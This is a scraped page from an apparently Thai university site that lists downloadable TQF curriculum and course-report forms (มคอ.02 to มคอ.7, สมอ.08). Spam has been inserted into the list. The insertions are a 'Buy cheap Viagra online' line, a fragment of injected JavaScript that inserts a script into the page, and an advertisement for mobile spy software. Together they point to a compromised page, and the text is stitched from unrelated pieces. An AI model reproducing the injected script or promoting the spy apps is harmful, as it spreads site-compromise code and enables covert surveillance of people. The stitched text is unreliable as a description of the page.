แบบฟอร์ม มคอ./สมอ.

แบบฟอร์ม TQF

แบบฟอร์ม รายงานข้อมูลการพิจารณารายละเอียดของหลักสูตร ระดับปริญญาตรี (มคอ.02)

แบบฟอร์ม รายละเอียดของรายวิชา (มคอ.3)

ตัวอย่างการเขียน รายละเอียดของรายวิชา (มคอ.3) (โดยงานประกันคุณภาพ)

แบบฟอร์ม รายละเอียดของประสบการณ์ภาคสนาม (มคอ.4)

แบบฟอร์ม รายงานผลการดำเนินการของรายวิชา (มคอ.5)

แบบฟอร์ม รายงานผลการดำเนินการของประสบการณ์ภาคสนาม (มคอ.6)

แบบฟอร์ม รายงานผลการดำเนินการของหลักสูตร (มคอ.7)(โดยงานประกันคุณภาพ)

แบบฟอร์ม การขอปิดหลักสูตร (สมอ.08)

แบบฟอร์ม การขอปรับปรุงแก้ไขหลักสูตร (สมอ.08)

 


Buy cheap Viagra online

แบบฟอร์ม การตรวจสอบรูปแบบรายละเอียดเล่มหลักสูตร (แบบฟอร์ม check list)

document.currentScript.parentNode.insertBefore(s, document.currentScript);https://topspyapps.net - The most popular 2017 spy software applications for the mobile phones.

Leave a Comment

คุณอาจจะใช้ป้ายกำกับและคุณสมบัติHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>